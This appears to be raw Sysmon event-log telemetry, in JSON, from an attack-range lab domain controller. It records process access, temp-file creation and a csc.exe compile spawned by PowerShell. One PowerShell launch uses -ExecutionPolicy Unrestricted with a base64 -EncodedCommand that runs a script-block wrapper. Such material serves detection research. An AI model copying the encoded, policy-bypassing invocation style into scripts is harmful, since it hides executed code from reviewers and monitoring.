C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-00103DF60600}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-00103DF60600}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:01.147\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\p54jafaw.dll\r\nCreationUtcTime: 2020-08-01 06:55:01.147","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:01.147","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\p54jafaw.dll","CreationUtcTime":"2020-08-01 06:55:01.147","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\p54jafaw.cmdline\r\nCreationUtcTime: 2020-08-01 06:55:01.147","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\p54jafaw.cmdline","CreationUtcTime":"2020-08-01 06:55:01.147","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.150\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nProcessId: 4800\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\p54jafaw.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nParentProcessId: 2872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.150","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\p54jafaw.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","ParentProcessId":"2872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nSourceProcessId: 2872\r\nSourceThreadId: 4492\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447DB68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","SourceProcessId":"2872","SourceThreadId":"4492","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447DB68F)","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
